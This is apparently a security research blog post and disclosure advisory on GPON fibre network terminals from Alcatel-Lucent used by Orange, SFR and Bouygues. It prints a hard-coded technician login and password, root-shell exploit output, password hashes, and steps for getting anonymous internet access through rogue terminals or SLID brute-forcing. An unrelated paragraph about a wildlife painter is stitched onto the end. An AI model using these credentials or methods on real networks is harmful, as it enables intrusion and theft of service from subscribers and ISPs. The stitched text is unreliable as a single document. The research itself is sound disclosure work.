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GPON FTTH networks (in)security – IT Security Research by Pierre

Table of contents

 1. Introduction
 2. Explanation of GPON networks
     2.1. GPON Network
     2.2. ONT/ONU used in this research
     2.3. ONT Authentication
 3. Studying the ONTs
 4. Internet Authentication
     4.1. SFR
     4.2. Orange
     4.3. Bouygues FTTH
 5. Security Threat against the GPON FTTH model
 6. Physical Security
 7. Powning the ONT
     7.1. Remote Code execution
     7.2. Analysing the ONT
     7.3. Backdoor credentials in /etc/passwd*
     7.4. Backdoor accounts in the HTTP configuration files
     7.5. Bad UNIX RIGHTS and UID/GID everywhere
     7.6. Same SSH keys used in all the firmware
     7.7. Reverse-engineering – introducing Alcatel binaries
     7.8. Reverse-engineering – Strange binary
 8. Bruteforce
 9. Conclusion
 10. Report Timeline
 11. Credits and Greetings
 12. License

1. Introduction

GPON FTTH network is the future: GPON FTTH (Fiber To The Home) is very popular because it is cheap and allows people to download legal Video On Demand damn fast. Everybody wants GPON FTTH at home, you, me, my dog and my neighbors. In fact, you are sharing 2.5gbps of downstream with others clients (but it is still fast).

This article will present FTTH GPON (in)security, based on attacks against IoT. It’s mainly written against GPON networks in France and will focus on Alcatel Lucent GPON networks (Orange, Bouygues and SFR). Free FTTH network (point to point network) is out of scope in this research.

This is the first public article about (in)security of FTTH GPON networks. It will contain RCE against ONT/ONU (the device located in your house which is connected to the fiber optic) and tips how to potentially get an anonymous 1gbps Internet connection in France. The legal implication of this research is interesting: When FTTH connections are involved, the IP used as evidence may not be identifiable any more thus questions its legitimate value.

Telecom Italia did a great presentation about theoretical GPON security in 2009, but there are not a lot of documentations about the security of GPON FTTH networks apart from this presentation. Please note there may have some facts that still need to be clarified in this research (but all the major facts were confirmed by a major French ISP).

This research was mainly done in 2013-2014 but was kept private. It was done for educational purpose in order to understand how GPON FTTH works.

Legal Note: these tests were done using my FTTH connections at home. Yes, you can have up to 4 FTTH connections working at the same time with same or different ISPs in France. Orange was contacted 6 months ago (May 11, 2016) about these vulnerabilities.

You can find FTTH GPON networks in other countries too, e.g. South Korea.

2. Explanation of GPON networks

A GPON network is a passive optical network featuring one-to-multipoint architecture.

It consists of Optical Line Terminal (OLT), Passive Optical Splitter and Optical Network Unit (Optical Network Transceiver, ONU/ONT). The fiber optic strands are shared among multiple clients: splitters are used to separate and aggregate the optical signal.

  • GPON is the acronym for Gigabit-capable Passive Optical Networks
  • OLT is the acronym for Optical Line Terminal.
  • ONU is the acronym for Optical Network Unit. – multiple clients
  • ONT is the acronym for Optical Network Transceiver or Optical Network Terminal – single clients
  • SLID is the acronym for Subscriber Line IDentifier.
  • POS is the acronym for Passive Optical Splitter.

A GPON network allows multiple ISP. In France, Orange, SFR and Bouygues Telecom are using the same GPON FTTH networks.

2.1. GPON Network


The ONU is hosted at home, and it encodes and receives the signal for the fiber. It’s basically a blackbox.
We can name the ONU an ONT (Optical Network Transceiver) because it translates the signals present in the fiber (light) into electrical signals (RJ45), and vice versa.

From a Huawei presentation:

They are connected in the underground to a large passive splitter. This splitter doesn’t have physical security protection (we will speak about this point later).

— Photo from http://www.degroupnews.com/dossier/sfr-pose-la-fibre-optique-dans-un-appartement

Transmission of data:

According to the specification, transmitting upstream is in cleartext.

The downstream can be optionally encrypted using AES-128. It depends on the ISP.

From a Huawei presentation:

2.2. ONT/ONU used in this research

From left to right:

  • ONT currently provided by SFR France: Alcatel I-020G-F.
  • Second ONT provided by Orange France since 2014: Alcatel I-010G-A.
  • First ONT provided by Orange France in 2013: Alcatel I-010G-A.

From left to right:

  • Back of the first ONT provided by Orange France in 2013.
  • Back of the second ONT provided by Orange France since 2014.
  • Back of the ONT currently provided by SFR France.

The fiber is linked to a remote OLT managed by the ISP, as shown in the network diagram. The RJ45 port is normally linked to a proprietary triple-play box (or a linux/*BSD router).

The ONT provided by SFR has 2 gigabit RJ45 connectors. Only the port 1 seems to be usable.

The 3 ONT are Alcatel-Lucent products. They seem to share the same vulnerabilities.

2.3. ONT Authentication

G.984.3 defines two authentication mechanisms:

  • pre-provision of the ONU/ONT to an OLT, using a shared SLID (Subscriber Line IDentifier)
  • the SLID is unknown and the OLT activates the ONT/ONU on the fly.

There is no verification of the remote OLT, so authentication with a rogue remote OLT is possible, allowing wiretapping. This is another subject.

The SLID can be in different modes:


The SLID can be saved in two formats: hexadecimal or alphanumeric.

From my research, the SLID for a SFR connection is VOLATILE and is not set to a fixed value: the OLT activates the ONT on the fly.

The SLID for an Orange connection is PERMANENT and is a shared secret between the ONU/ONT and the OLT. The SLID is entered into the ONT by a technician when he comes to your home to install the fiber.
The authentication is based on this value. Changing the SLID to an incorrect value will interrupt the connection of the ONT to the remote OLT, which means NO INTERNET.

The SLIDs that were linked to my Orange FTTH accounts were (obfuscated, with 0 for numbers and X for letters):

  • 0W1JXXXX <- it looked like a random string (alphanumeric)
  • 0562100000 <- it looked like a French phone number

3. Studying the ONTs

ONT is our heaven’s gate. Controlling ONT will give us a lot of possibilities.

You need to be on the same subnet to access to ONT:

user@kali:~$ sudo ifconfig eth0 netmask

Nmap against the device:

user@kali:~$ sudo nmap -sS -sV -v -O -n

Starting Nmap 4.37 ( http://nmap.org ) at 2014-02-03 12:54 EDT
NSE: Loaded 29 scripts for scanning.
Initiating ARP Ping Scan at 12:54
Scanning [1 port]
Completed ARP Ping Scan at 12:54, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:54
Scanning [1000 ports]
Discovered open port 23/tcp on
Discovered open port 22/tcp on
Discovered open port 80/tcp on
22/tcp open  tcpwrapped
23/tcp open  telnet     Linux telnetd
80/tcp open  http       BusyBox httpd
MAC Address: AC:9C:E4:AA:AA:AA (Alcatel-Lucent Shanghai Bell Co.)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 0.001 days (since Tue Feb 03 12:52:52 2014)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; Device: media device; CPE: cpe:/o:linux:linux_kernel

The daemon on port 22 doesn’t want to speak to my telnet client 🙁

user@kali:~$ telnet 22
Connected to
Escape character is '^]'.

Connection closed by foreign host.

From my research, an ONT has two remote panels:

  • a HTTP webpage (
  • a telnet account (telnet://

There is a documented backdoor account in the busybox mailing list (2009, http://lists.busybox.net/pipermail/busybox/2009-July/070031.html written by an Alcatel employee). This is a limited account, allowing only to change small things in the device:

login: CRAFTSPERSON (was "CRAFT" at first, from the mailing list post)
password: ALC#FGU

This is the account used by technicians to configure the ONT during the FTTH installation and is widely known.

The backdoor account can be found too using the NeufBox configuration API

user@kali:~$ wget 'http://ncdn.nb4dsl.neufbox.neuf.fr/nb6_Version%203.3.9/NB6-CONFIG-R3.3.9.2'

This file contains the credentials for the ONT:


Administration webpage (in Flash) using the credentials:

Login to the first Orange ONT using the backdoor account will provide a restricted shell.

user@kali:~$ telnet
Connected to
Escape character is '^]'.

MontaVista(R) Linux(R) Professional Edition 3.1
Linux/ppc 2.4.20_mvl31-gponsoc

(none) login: CRAFTSPERSON

MontaVista(R) Linux(R) Professional Edition 3.1

                   Craft user Login                            

   Main Menu

     1. Enter SLID in volatile mode  
     2. Enter SLID in permanent mode (non-volatile)  
     3. Enter SLID in registration mode (non-volatile)  
     4. Retrieve SLID    
     5. Clear SLID       
     6. Retrieve ranging state   
     7. Retrieve optical level   
     8. More options       
     9. Logout

     Enter choice : 4

   Main Menu

     1. Enter SLID in volatile mode  
     2. Enter SLID in permanent mode (non-volatile)  
     3. Enter SLID in registration mode (non-volatile)  
     4. Retrieve SLID    
     5. Clear SLID       
     6. Retrieve ranging state   
     7. Retrieve optical level   
     8. More options       
     9. Logout

     Enter choice : 6
Ranging State = Initial State (Auto-Disable State = Normal State)
press enter key to continue...

   Main Menu

     1. Enter SLID in volatile mode  
     2. Enter SLID in permanent mode (non-volatile)  
     3. Enter SLID in registration mode (non-volatile)  
     4. Retrieve SLID    
     5. Clear SLID       
     6. Retrieve ranging state   
     7. Retrieve optical level   
     8. More options       
     9. Logout

     Enter choice : 7
ponOpticalSignalLevel =  -50.00 dBm
press enter key to continue...

   Main Menu

     1. Enter SLID in volatile mode  
     2. Enter SLID in permanent mode (non-volatile)  
     3. Enter SLID in registration mode (non-volatile)  
     4. Retrieve SLID    
     5. Clear SLID       
     6. Retrieve ranging state   
     7. Retrieve optical level   
     8. More options       
     9. Logout

     Enter choice : 8
Additional menu items are not available, press enter key to continue...

This account can only configure options relative to the SLID and can show the SLID and the fiber optical signal level.

4. Internet Authentication

When you connect the fiber to the ONT, then the ONT to the proprietary box (router), you need to understand how the proprietary box gets an Internet connection:

(Internet) ---Fiber--- [ONT] ---RJ45--- [Router provided by the ISP]
                                            |                |
                                           RJ45             Wifi
                                            |                |
                                        [Computer 1]    [Computer 2]

By using a Linux/BSD computer instead of the provided router:

(Internet) ---Fiber--- [ONT] ---RJ45--- [Linux Computer]

4.1. SFR

When using SFR, there is no Internet Authentication.

Assuming you are sending the correct vendor string in the DHCP request:

send dhcp-class-identifier "neufbox5_NB5-SER-r1_ND5-MAIN-R2.2.2";

Typing dhclient eth0 in your Linux laptop, connected to the ONT, will give you a public IP on your eth0 interface.

4.2. Orange

When using Orange, the situation is MUCH more complicated. There is a complicated authentication for accounting.

You have to do PPPoE authentication over VLAN835. In my view, PPPoE is used because of legacy reason (compatibility with RTC and ADSL authentication servers).
835 seems to be a tribute to the 8/35 VCI/VPI (Virtual Path Identifier, Virtual Circuit Identifier) used in ADSL connection with ATM encapsulation. Others VLANs are used (for voice and for TVs but it’s out of scope).

An OpenBSD configuration is:

# cat /etc/hostname.if0
# cat /etc/hostname.vlan835
vlan 835 vlandev if0 up
# cat /etc/hostname.pppoe0
inet NONE \
    ppppoedev vlan835 authproto chap \
    authname 'fti/XXXXXXX' authkey 'XXXXXXX'
!/sbin/route add default ifp pppoe0

A Linux configuration is more complex (from https://benjamin.sonntag.fr/spip.php?page=forum&id_article=43&id_forum=60&lang=fr):

$ cat /etc/network/interfaces
auto eth0 eth0.835 ppp0
iface eth0 inet manual
iface eth0.835 inet manual
iface ppp0 inet ppp
   provider ft_fibre

$ cat/etc/ppp/peers/ft_fibre
pty "/usr/sbin/pppoe -I eth0.835 -T 80 -m 1452"
lcp-echo-interval 20
lcp-echo-failure 3
connect /bin/true
mtu 1492
plugin rp-pppoe.so eth0.835
user "fti/XXXXXXX"

$ cat /etc/ppp/chap-secrets:
"fti/XXXXXXX"   *    "XXXXXXX"

Note that when you are using an Orange connection, you are directly authenticated on the orange website (www.orange.fr), based on your IP. You can manage the connection, read the emails, evil stuff …

From my research, you need valid PPPoE FTTH credentials. ADSL and RTC credentials don’t work.

Breaking news: it appears Orange is starting to replace PPPoE authentication with DHCP (without authentication) since november 2015. This needs to be confirmed but several sources use DHCP to get a working IPv4.

4.3. Bouygues FTTH

When using Bouygues, there is no Internet Authentication.

Bouygues uses DHCP over VLAN200.

Assuming you are sending the correct vendor string in the DHCP request with the MAC address of the provided router:

send vendor-class-identifier "byteliad_data";

Typing dhclient eth0.200 in your Linux laptop, connected to the ONT, will give you a public IP on your eth0.200 interface.

5. Security Threat against the GPON FTTH model

From telecomitalia_delutiis_nextgenerationaccessnetwork(in)security.pdf:

The security mechanisms already defined are based on the assumption that all the GPON
elements will be strongly physically protected
. GPON communication are vulnerable to
severe security issues, such as:

Fake/Forged OLT: currently no OLT identification and authentication mechanisms have been specified

Man In The Middle (MITM) attacks

     Passive attacks: password and keys sent as cleartext

     Active attack: sensitive PLOAM messages are not authenticated (e.g. PASSWORD, encryption KEY)

Several kinds of DOS (Denial of Service) at GPON level e.g. during the activation phases.


6. Physical Security

From what we know now, an attacker can easily go in the basement of buildings and connect rogue ONTs to the splitter by disconnecting legitimate clients. It appears all the GPON elements are not strongly physically protected and having access to elements is trivial.

Photos from http://www.degroupnews.com/dossier/sfr-pose-la-fibre-optique-dans-un-appartement:

If they are SFR clients, just connecting an ONT configured in a VOLATILE mode will give, in theory, an attacker an anonymous high speed (1gpbs) Internet Access with a public IP address.

If they are Bouygues clients, just connecting an ONT configured in a VOLATILE mode will give, in theory, an attacker an anonymous high speed (1gpbs) Internet Access with a public IP address.

If they are Orange clients, an attacker needs to have a valid SLID and valid FTTH credentials to get an Internet connection: this sucks for the attacker but there are solutions (hint: SLID bruteforce). Note that, apparently, Orange is starting to accept DHCP instead of PPP authentication.

7. Powning the ONT

As we’ve already see, the ONT/ONU are Linux/ppc 2.4.20_mvl31-gponsoc clients devices.

Note that Bouygues seems to use another model of ONT.

7.1. Remote Code execution

We are lucky to see there is a trivial RCE in the CGIs available and 2 valid 0day exploits were written for the noble cause.

We test them live:

user@kali:~$ ./hacktheplanet.sh
Adding an user ONT / ALC#FGU
Launching telnet client
Connected to
Escape character is '^]'.

MontaVista(R) Linux(R) Professional Edition 3.1
Linux/ppc 2.4.20_mvl31-gponsoc

(none) login: ONT
Password: ALC#FGU

MontaVista(R) Linux(R) Professional Edition 3.1

BusyBox v1.4.2 (2010-11-10 23:30:26 EST) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

$ id
uid=100(CRAFTSPERSON) gid=100(users)
$ ls -latrR /              
Segmentation fault
$ echo wow
$ ps -auxww
  PID  Uid     VmSize Stat Command
    1 root        564 S   init [3]   
    2 root            SW  [keventd]
    3 root            SWN [ksoftirqd_CPU0]
    4 root            SW  [kswapd]
    5 root            SW  [bdflush]
    6 root            SW  [kupdated]
    7 root            SW  [mtdblockd]
  109 root        644 S   /usr/sbin/inetd 
  126 root            SWN [jffs2_gcd_mtd3]
  138 root       1600 S   /usr/sbin/sshd 
  417 root       1212 S   /usr/alcatel/bin/dbg_logger 
  418 root       1212 S   /usr/alcatel/bin/dbg_logger 
  420 root       1212 S   /usr/alcatel/bin/dbg_logger 
  431 root       1244 S N /usr/alcatel/bin/bkgndprocess 
  439 root       1124 S   /usr/alcatel/bin/ontah 
  450 root       1256 S   /usr/alcatel/bin/parser 
  462 root       1616 S   /usr/alcatel/bin/omciMgr 
  473 root       1400 S   /usr/alcatel/bin/gponMac 
  516 root        672 S   /usr/bin/httpd -h /usr/alcatel/web 
  531 root       1648 S   /var/temp/tagging 
  546 root       1348 S   /usr/alcatel/bin/IGMP 
  554 root       1268 S   /usr/alcatel/bin/ethOAM 
  563 root       1180 S N /usr/alcatel/bin/rateShaping 
  572 root       1144 S N /usr/alcatel/bin/IBcast 
  589 root       1256 S N /usr/alcatel/bin/EFMOAM 
  602 root       1256 S N /usr/alcatel/bin/EFMOAM 
  603 root       1256 S N /usr/alcatel/bin/EFMOAM 
  604 root       1256 S N /usr/alcatel/bin/EFMOAM 
  605 root       1176 S   /usr/alcatel/bin/eqpt 
  613 root       1648 S   /var/temp/tagging 
  614 root       1648 S   /var/temp/tagging 
  615 root       1648 S   /var/temp/tagging 
  616 root       1256 S   /usr/alcatel/bin/parser 
  617 root       1256 S   /usr/alcatel/bin/parser 
  618 root       1348 S   /usr/alcatel/bin/IGMP 
  619 root       1348 S   /usr/alcatel/bin/IGMP 
  620 root       1268 S   /usr/alcatel/bin/ethOAM 
  621 root       1268 S   /usr/alcatel/bin/ethOAM 
  622 root       1268 S   /usr/alcatel/bin/ethOAM 
  627 root       1180 S N /usr/alcatel/bin/rateShaping 
  628 root       1180 S N /usr/alcatel/bin/rateShaping 
  629 root       1144 S N /usr/alcatel/bin/IBcast 
  630 root       1144 S N /usr/alcatel/bin/IBcast 
  646 root        524 S   /sbin/getty -L tts/1 9600 115200 vt100 
  908 root        652 S   inetd 
 1155 root        832 S   in.telnetd:
 1156 CRAFTSPERSO    848 S   -sh 
 1520 CRAFTSPERSO    648 R   ps -auxww 

Nice but I prefer a root shell:

user@kali:~$ ./hackthemoon.sh
to the moon ...
uid=0(root) gid=0(root)
echo much access very root !
much access very root !
ls -la
drwxr-xr-x   15 3079     619          1024 Jun 29  2013 .
drwxr-xr-x   15 3079     619          1024 Jun 29  2013 ..
drwxrwxrwx    2 4223     619          1024 Nov 18  2010 bin
drwxr-xr-x    1 root     root            0 Jan  1  1970 dev
drwxrwxrwx   11 4223     619          1024 Dec 31 23:59 etc
drwxrwxrwx    4 51454    619          1024 Nov 11  2005 home
drwxrwxrwx    4 4223     619          2048 Aug  2  2005 lib
drwx------    2 root     root        12288 Jun 29  2013 lost+found
drwxrwxrwx    2 51454    619          1024 Aug  2  2005 mnt
dr-xr-xr-x   64 root     root            0 Jan  1  1970 proc
drwxrwxrwx    2 51454    619          1024 Aug  2  2005 root
drwxrwxrwx    2 4223     619          1024 Aug  2  2005 sbin
drwxrwxrwx    2 51454    619          1024 Jan  1 00:00 tmp
drwxrwxrwx   11 4223     619          1024 Aug  2  2005 usr
drwxrwxrwt    5 root     root          100 Jan  1  2006 var
echo nice unix rights !!
nice unix rights !!

You can fetch hacktheplanet.sh.

You can fetch hackthemoon.sh.

A proofreader noted that it would be easier to create an exploit which adds an user with UID 3079 and GID 619. He is right.

7.2. Analysing the ONT


$ cat /proc/meminfo 
        total:    used:    free:  shared: buffers:  cached:
Mem:  62537728 55193600  7344128        0   663552 31174656
Swap:        0        0        0
MemTotal:        61072 kB
$ cat /proc/cpuinfo
cpu             : e300c2 (83xx)
revision        : 0.32 (pvr 8084 0020)
bogomips        : 188.00
Vendor          : Freescale Inc.
Machine         : msc7120
core clock      : 282 MHz
bus  clock      : 141 MHz
PVR             : 0x80840020
SVR             : 0x80400010
SPRIDR          : 0x80400021
PLL setting     : 0x8
Memory          : 64 MB
$ uname -ap
Linux (none) 2.4.20_mvl31-gponsoc #1 Wed Jul 31 09:26:02 EDT 2013 ppc unknown

7.3. Backdoor credentials in /etc/passwd*

The /etc/passwd* files contain backdoor credentials to login to the remote ONT:

user@kali:~$ cat passwd
sshd:*:74:74:Privilege-separated SSH:/tmp:/sbin/nologin

It appears that ONTUSER is a backdoor root account.

Other files exist in /etc – passwd.ENABLE:

user@kali:~$ cat passwd.ENABLE 
ICONFIG:9E/ixZ86A5mTQ:0:0:Alcatel User,,,:/tmp:/bin/sh
sshd:*:74:74:Privilege-separated SSH:/tmp:/sbin/nologin

Other backdoor accounts but not used (ICONFIG, restricted — with root privileges).

The passwd.DISABLE file contains credentials too:

user@kali:~$ cat passwd.DISABLE
ICONFIG:9E/ixZ86A5mTQ:0:0:Alcatel User,,,:/tmp:/bin/sh
sshd:*:74:74:Privilege-separated SSH:/tmp:/sbin/nologin

Other interesting users (with root privileges) with hashes: ICONFIG, restricted, ONTUSER.

John will reveal password, like:


7.4. Backdoor accounts in the HTTP configuration files

The /usr/alcatel/web/httpd.conf file contains credentials:

user@kali:~$ ./usr/alcatel/web/httpd.conf

And the /etc/httpd.conf contains credentials too:

user@kali:~$ cat ./etc/httpd.conf

7.5. Bad UNIX RIGHTS and UID/GID everywhere

# ls -la /
drwxr-xr-x   15 3079     619          1024 Jun 29  2013 .
drwxr-xr-x   15 3079     619          1024 Jun 29  2013 ..
drwxrwxrwx    2 4223     619          1024 Nov 18  2010 bin
drwxr-xr-x    1 root     root            0 Jan  1  1970 dev
drwxrwxrwx   11 4223     619          1024 Dec 31 23:59 etc
drwxrwxrwx    4 51454    619          1024 Nov 11  2005 home
drwxrwxrwx    4 4223     619          2048 Aug  2  2005 lib
drwx------    2 root     root        12288 Jun 29  2013 lost+found
drwxrwxrwx    2 51454    619          1024 Aug  2  2005 mnt
dr-xr-xr-x   64 root     root            0 Jan  1  1970 proc
drwxrwxrwx    2 51454    619          1024 Aug  2  2005 root
drwxrwxrwx    2 4223     619          1024 Aug  2  2005 sbin
drwxrwxrwx    2 51454    619          1024 Jan  1 00:00 tmp
drwxrwxrwx   11 4223     619          1024 Aug  2  2005 usr
drwxrwxrwt    5 root     root          100 Jan  1  2006 var


7.6. Same SSH keys used in all the firmware

The SSH keys are common to the 3 ONTs. They are not generated locally but are stored in all the ONTs:

118cf5bad0322ed1215367679860a1ab  alcatel.orange.v1/etc/ssh/ssh_host_dsa_key
118cf5bad0322ed1215367679860a1ab  alcatel.sfr.v1/etc/ssh/ssh_host_dsa_key
118cf5bad0322ed1215367679860a1ab  alcatel.orange.v2/etc/ssh/ssh_host_dsa_key

1f2dc282fff78f4682fafb166bfe7512  alcatel.orange.v1/etc/ssh/ssh_host_rsa_key.pub
1f2dc282fff78f4682fafb166bfe7512  alcatel.sfr.v1/etc/ssh/ssh_host_rsa_key.pub
1f2dc282fff78f4682fafb166bfe7512  alcatel.orange.v2/etc/ssh/ssh_host_rsa_key.pub

4386f5d936f01219075999d98e5758f9  alcatel.orange.v1/etc/ssh/ssh_host_rsa_key
4386f5d936f01219075999d98e5758f9  alcatel.sfr.v1/etc/ssh/ssh_host_rsa_key
4386f5d936f01219075999d98e5758f9  alcatel.orange.v2/etc/ssh/ssh_host_rsa_key

5c3e0520cd2c0b385016bf0909280e3d  alcatel.orange.v1/etc/ssh/ssh_host_key.pub
5c3e0520cd2c0b385016bf0909280e3d  alcatel.sfr.v1/etc/ssh/ssh_host_key.pub
5c3e0520cd2c0b385016bf0909280e3d  alcatel.orange.v2/etc/ssh/ssh_host_key.pub

6d8f94cd4c1e57cc6a7e6d48d421f1e9  alcatel.orange.v1/etc/ssh/ssh_host_dsa_key.pub
6d8f94cd4c1e57cc6a7e6d48d421f1e9  alcatel.sfrv1.sfr/etc/ssh/ssh_host_dsa_key.pub
6d8f94cd4c1e57cc6a7e6d48d421f1e9  alcatel.orange.v2/etc/ssh/ssh_host_dsa_key.pub

da1e8ba42dfb2e1dfd105f8cc7a61cbb  alcatel.orange.v1/etc/ssh/ssh_host_key
da1e8ba42dfb2e1dfd105f8cc7a61cbb  alcatel.sfr.v1/etc/ssh/ssh_host_key
da1e8ba42dfb2e1dfd105f8cc7a61cbb  alcatel.orange.v2/etc/ssh/ssh_host_key

7.7. Reverse-engineering – introducing Alcatel binaries

The Alcatel binaries are useful to control the FTTH connection 🙂

/usr/alcatel/help/* contains all the help files:



user@kali:~$ cat help/gponMac/send.help

A command string is sent to the gponMac process.  The gponMac process
handles the command string and takes the appropriate action.

In order to send a command to the gponMac process, the following needs
to be done.
1. The gponMac process must be running.
2. The send command must be in the path.
3. The 'send gpon ' command is then executed to send
 to the gponMac process.

Valid commands are:

rw               ww               laser            pm
rs               dump             ri               slid
max1932          alarms           ethhdr(*1)       interrupts
sim              deviceid         ranginginfo      dsphy
dstc             usbwc            usgem            ustc
usphy            fpga(*2)         video(*3)        help

*1 - Only available on Currituck based boards.
*2 - Only available on FPGA based boards.
*3 - Only available on boards with video.

To get more detailed information on a specific command, use:
'send gpon help '

To get more detailed help information on all commands, use:
'send gpon help all'

To retrieve the current ranging state, the rs command, use:
'send gpon rs'

It appears the gponMac program is a big mess without security by design.

Having fun with Alcatel daemons:

$ send help
send sniffer               - send  to the sniffer process
send gpon                  - send  to the gponMac process
send test                 - perform the specified test cmd
    setpowerdown            - send powerdown message to gponMac process
  GPON MAC API test cmds:
    addmcastentry   ||
    confslid            (test slid only)
    setopticalattr        ||
      allocId                              - 0-4095
      portId                               - 0-4095
      enable                               - 0(disable) 1(enable)
      dir                                  - 0(upstream) 1(downstream) 2(bi-dir)
      pbits                                - 0-7
      weight                               - 0-255
      vid                                  - VLAN ID
      omci, 0vlan, keeptag, cpvid, wait    - 0(no) 1(yes)
      dest    - 0(GMII0) 1(GMII1) 2(loopback) 3(drop to processor)
      mac                                  - 0xXXXXXX

If you want to debug GPON, use these commands:

empty -s -o /tmp/fifo.in "show gpon type\nshow gpon slid\nshow gpon sn\nshow firmware version\nshow gpon RSSI\n"
empty -s -o /tmp/fifo.in "show led\nshow uptime\nshow download status\nshow gpon ranging state\nshow gpon status\n"
nvram get ont_slid

Possible arguments for send:

show gpon type
show gpon slid
show gpon sn
show firmware version
show gpon RSSI
show led
show uptime
show download status
show gpon ranging state
show gpon status
gpon dump
gpon rw 0
gpon rw 4
gpon rw 100
gpon rw 104
gpon ww 100 ff
gpon rw 3000
gpon rw 3004
gpon ww 3000 ff
gpon rw 3010
gpon rw 3014
gpon ww 3010 ff
gpon rw 0x4024
gpon rw 0x4030
gpon rw 0x4034
gpon rw 0x4038
gpon rw 0x403c
gpon rw 0x4040
gpon rw 0x4044
gpon rw 100   # ALARMS
gpon rw 110   # BIP errors
gpon rw 114   # ERRORED Frames
gpon rw 11c   # OOF counters
gpon rw 118   # PSYNC error counters
gpon rw 120   # Kill traffic registers 
gpon rw 124   # last bit traffic enable

You can have fun reversing Alcatel binaries 🙂

Having fun reversing the binaries is left as an exercise for the reader 😀

7.8. Reverse-engineering – Strange binary

user@kali:~$ grep -ai backdoor usr/freescale/bin/hld_test

This command is a backdoor to reading ONU MAC registers including bad addresses


8. Bruteforce

When SLIDs are PERMANENT, it seems to be trivial to bruteforce SLIDs and PON passwords (/usr/alcatel/dbg_bin/spiusrtest -f ponpassword). You can then authenticate yourself with PPP or, if it works, just by getting a connection with DHCP.

When SLIDs are VOLATILE, just connecting to a FTTH located in a basement will provide, in theory, the attacker with an anonymous gigabit FTTH connection.

9. Conclusion

As we have seen earlier, in certain cases, the security provided by GPON FTTH networks can be very bad.

I plan to publish a next article about FTTH and explain how a FTTH connection works inside the ONT/ONU and how an attacker can bruteforce SLIDs and PON passwords.

The possibilities of exploiting GPON FTTH networks are endless – that is, having fast Internet connections at home and learning interesting stuff 😉

10. Report Timeline

  • 2013: 0day vulnerabilities found in ONTs by Pierre Kim, reverse-engineering of ONTs and security analysis of GPON FTTH
  • Feb, 2014: First draft written by Pierre Kim
  • May 11, 2016: Pierre Kim sends a pre-advisory to Orange, the biggest French ISP
  • May 11, 2016: Orange confirms the reception of the documentation
  • Jun 16, 2016: Pierre Kim asks Orange for update
  • Jun 20, 2016: Orange confirms its work is in progress
  • Jul 29, 2016: Pierre Kim asks Orange for update
  • Sep 22, 2016: Pierre Kim asks Orange for update
  • Sep 22, 2016: Orange says the work is still in progress to evaluate the vulnerabilities
  • Sep 29, 2016: Orange asks to have a conference call
  • Sep 30, 2016: Pierre Kim asks Orange for update
  • Oct 10, 2016: Orange says the work is still in progress
  • Oct 22, 2016: Pierre Kim asks Orange for update and for a written answer
  • Oct 24, 2016: Pierre says he will disclose the information soon because of lack of answers from Orange
  • Oct 24, 2016: Orange asks for a new conference call
  • Oct 26, 2016: Orange confirms the vulnerabilities
  • Oct 26, 2016: Following the conference call with Orange, Pierre Kim informs Orange he will release the research and asks Orange for an official answer
  • Nov 01, 2016: Public disclosure

11. Credits and Greetings

This research was done by Pierre Kim (@PierreKimSec).

I would like to thank my wife who endures my time-consuming passions (maybe craziness is the correct term).

I would like to thank A, J and T (you know who you are 🙂

I would like to thank the LSE EPITA for providing me with a lot of CPU power used to crack the hashed backdoor passwords found in the ONT firmware.

12. License

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

published on 2016-11-01 00:00:00 by Pierre Kim


The realistic wildlife fine art paintings and prints of Jacquie Vaux begin with a deep appreciation of wildlife and the environment. Jacquie Vaux grew up in the Pacific Northwest, soon developed an appreciation for nature by observing the native wildlife of the area. Encouraged by her grandmother, she began painting the creatures she loves and has continued for the past four decades. Now a resident of Ft. Collins, CO she is an avid hiker, but always carries her camera, and is ready to capture a nature or wildlife image, to use as a reference for her fine art paintings.

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